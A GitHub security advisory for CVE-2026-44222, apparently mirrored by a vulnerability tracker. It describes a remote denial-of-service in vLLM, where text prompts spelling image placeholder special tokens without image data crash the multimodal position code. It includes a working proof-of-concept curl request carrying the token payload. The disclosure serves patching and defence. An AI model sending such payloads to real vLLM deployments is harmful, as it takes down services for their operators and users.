GHSA-HPV8-X276-M59F
Vulnerability from github – Published: 2026-05-05 22:21 – Updated: 2026-05-13 16:27
VLAI?
Summary
vLLM Vulnerable to Remote DoS via Special-Token Placeholders
Details
Summary
This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.
Details
- Affected component: multimodal input position computation.
- File/functions (paths are indicative):
- vllm/model_executor/layers/rotary_embedding.py
- get_input_positions_tensor(...)
- _vl_get_input_positions_tensor(...)
- Failure mechanism:
- The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.
- When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.
Representative snippet (context):
# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
cls,
input_tokens,
hf_config,
image_grid_thw,
video_grid_thw,
...,
):
# detect video tokens
video_nums = (vision_tokens == video_token_id).sum()
# later in processing
t, h, w = (
video_grid_thw[video_index][0], # IndexError if no video data
video_grid_thw[video_index][1],
video_grid_thw[video_index][2],
)
Abbreviated call path:
OpenAI API request
→ vllm.v1.engine.core: step/execute_model
→ vllm.v1.worker.gpu_model_runner: _update_states/execute_model
→ vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor
→ _vl_get_input_positions_tensor
→ IndexError: list index out of range
PoC
Environment
- vLLM: 0.10.0
- Model: Qwen/Qwen2.5-VL-3B-Instruct
- Launch server:
python -m vllm.entrypoints.openai.api_server \
--model Qwen/Qwen2.5-VL-3B-Instruct \
--port 8000
Request (text-only, no image/video data)
cat > request.json <<'JSON'
{
"model": "Qwen/Qwen2.5-VL-3B-Instruct",
"messages": [
{
"role": "user",
"content": [
{ "type": "text",
"text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>" }
]
}
]
}
JSON
curl -s http://127.0.0.1:8000/v1/chat/completions \
-H 'Content-Type: application/json' \
--data @request.json
Observed result
- HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).
- In some deployments, the worker exits and capacity remains reduced until manual restart.
Impact
- Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.
- Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).
- Effect: Request → unhandled exception in position computation → worker termination / service unavailability.
Fixes
- Changes associated with https://github.com/vllm-project/vllm/issues/32656
Credits
Pengyu Ding (Infra Security, Ant Group)
Ziteng Xu (Infra Security, Ant Group)
Severity ?
6.5 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "vllm"
},
"ranges": [
{
"events": [
{
"introduced": "0.6.1"
},
{
"fixed": "0.20.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44222"
],
"database_specific": {
"cwe_ids": [
"CWE-129"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T22:21:41Z",
"nvd_published_at": "2026-05-12T20:16:43Z",
"severity": "MODERATE"
},
"details": "## Summary\nThis report explains a Token Injection vulnerability in vLLM\u2019s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on `image_grid_thw`/`video_grid_thw` are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.\n\n## Details\n- Affected component: multimodal input position computation.\n- File/functions (paths are indicative):\n - vllm/model_executor/layers/rotary_embedding.py\n - get_input_positions_tensor(...)\n - _vl_get_input_positions_tensor(...)\n- Failure mechanism:\n - The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.\n - When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.\n\nRepresentative snippet (context):\n```python\n# vllm/model_executor/layers/rotary_embedding.py\n@classmethod\ndef _vl_get_input_positions_tensor(\n cls,\n input_tokens,\n hf_config,\n image_grid_thw,\n video_grid_thw,\n ...,\n):\n # detect video tokens\n video_nums = (vision_tokens == video_token_id).sum()\n # later in processing\n t, h, w = (\n video_grid_thw[video_index][0], # IndexError if no video data\n video_grid_thw[video_index][1],\n video_grid_thw[video_index][2],\n )\n```\n\nAbbreviated call path:\n```\nOpenAI API request\n \u2192 vllm.v1.engine.core: step/execute_model\n \u2192 vllm.v1.worker.gpu_model_runner: _update_states/execute_model\n \u2192 vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor\n \u2192 _vl_get_input_positions_tensor\n \u2192 IndexError: list index out of range\n```\n\n## PoC\n### Environment\n- vLLM: 0.10.0\n- Model: Qwen/Qwen2.5-VL-3B-Instruct\n- Launch server:\n```bash\npython -m vllm.entrypoints.openai.api_server \\\n --model Qwen/Qwen2.5-VL-3B-Instruct \\\n --port 8000\n```\n\n### Request (text-only, no image/video data)\n```bash\ncat \u003e request.json \u003c\u003c\u0027JSON\u0027\n{\n \"model\": \"Qwen/Qwen2.5-VL-3B-Instruct\",\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": [\n { \"type\": \"text\",\n \"text\": \"what\u0027s in picture \u003c|vision_start|\u003e\u003c|image_pad|\u003e\u003c|vision_end|\u003e\" }\n ]\n }\n ]\n}\nJSON\n\ncurl -s http://127.0.0.1:8000/v1/chat/completions \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data @request.json\n```\n\n### Observed result\n- HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).\n- In some deployments, the worker exits and capacity remains reduced until manual restart.\n\n## Impact\n- Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.\n- Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).\n- Effect: Request \u2192 unhandled exception in position computation \u2192 worker termination / service unavailability.\n\n## Fixes\n\n* Changes associated with https://github.com/vllm-project/vllm/issues/32656\n\n## Credits\nPengyu Ding (Infra Security, Ant Group) \nZiteng Xu (Infra Security, Ant Group)",
"id": "GHSA-hpv8-x276-m59f",
"modified": "2026-05-13T16:27:48Z",
"published": "2026-05-05T22:21:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44222"
},
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/issues/32656"
},
{
"type": "PACKAGE",
"url": "https://github.com/vllm-project/vllm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "vLLM Vulnerable to Remote DoS via Special-Token Placeholders"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…